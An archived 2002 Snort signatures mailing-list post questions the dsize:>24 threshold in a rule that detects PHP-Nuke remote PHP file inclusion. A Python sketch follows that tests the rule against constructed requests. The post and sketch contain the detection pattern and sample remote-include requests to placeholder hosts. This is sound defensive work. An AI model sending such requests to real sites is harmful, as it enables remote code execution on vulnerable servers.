[Snort-sigs] PHPNuke rule

Michael Boman michael.boman at ...267...
Fri Jan 18 04:01:02 EST 2002


alert TCP $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"PHP-Nuke remote loading of PHP files exploit"; uricontent:"/index.php?file=http"; nocase; dsize:>24; flags:A+; classtype:web-application-attack;)

Why dsize: >24 ?

Smallest GET request I could think of is:

GET /?file=http://xx.xx/y

xx.xx = website address. Minimum number of characters in a domain = 2 + top-level domain (2)
y = script name

Any comments?

Best regards
 Michael Boman

-- 
Michael Boman       Mobile: +65 96942601  750C Chai Chee Road
Security Architect  Phone : +65 243 6800  #04-01
SecureCiRT          Fax   : +65 441 5119  Singapore 469003
http://www.securecirt.com mailto:michael.boman at ...267...

GnuPG: FA4E C6CC B73E 320E 3349  C64F 76CE 5F40 98AB 689C
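As an added illustration (not part of the original post), the two payload tests of the rule above re-implemented in Python and run over constructed HTTP requests, including the 25-byte minimal request the post reasons about. The hostnames are placeholders and the checks ignore ports and TCP flags.

```python
# Added example, not from the original post: a minimal re-implementation of the
# payload tests in the rule (uricontent + nocase, dsize:>24), applied to
# constructed HTTP requests so the effect of each test can be seen directly.
# Hosts such as "xx.xx" are placeholders, as in the post.

URICONTENT = "/index.php?file=http"   # matched case-insensitively (nocase)


def request_uri(payload: bytes) -> str:
    """Return the request-URI from the first line of an HTTP request, or ''."""
    first_line = payload.split(b"\r\n", 1)[0].decode("latin-1", "replace")
    parts = first_line.split(" ")
    return parts[1] if len(parts) >= 2 else ""


def dsize_ok(payload: bytes) -> bool:
    """Equivalent of dsize:>24 - the TCP payload must be longer than 24 bytes."""
    return len(payload) > 24


def uricontent_ok(payload: bytes) -> bool:
    """Equivalent of uricontent:"/index.php?file=http"; nocase;"""
    return URICONTENT in request_uri(payload).lower()


def rule_matches(payload: bytes) -> bool:
    """Both payload tests must hold (ports and TCP flags are not modelled)."""
    return dsize_ok(payload) and uricontent_ok(payload)


# The smallest request the post reasons about: 25 bytes, so dsize:>24 holds,
# but without "/index.php" in the URI the uricontent test does not.
MINIMAL = b"GET /?file=http://xx.xx/y"
# A constructed request that satisfies both tests (note the upper-case scheme).
REMOTE_INCLUDE = b"GET /index.php?file=HTTP://xx.xx/y HTTP/1.0\r\nHost: xx.xx\r\n\r\n"
# A constructed benign request to the same script with a local file argument.
LOCAL_INCLUDE = b"GET /index.php?file=about HTTP/1.0\r\nHost: xx.xx\r\n\r\n"

if __name__ == "__main__":
    samples = [("MINIMAL", MINIMAL), ("REMOTE_INCLUDE", REMOTE_INCLUDE),
               ("LOCAL_INCLUDE", LOCAL_INCLUDE)]
    for name, p in samples:
        print(f"{name:15} dsize={len(p):3d} dsize_ok={dsize_ok(p)} "
              f"uricontent_ok={uricontent_ok(p)} match={rule_matches(p)}")
```

Because "GET " plus the 20-byte uricontent pattern is already 24 bytes, any request that satisfies the uricontent test is at least that long, so dsize:>24 only excludes the degenerate case where nothing at all follows the pattern.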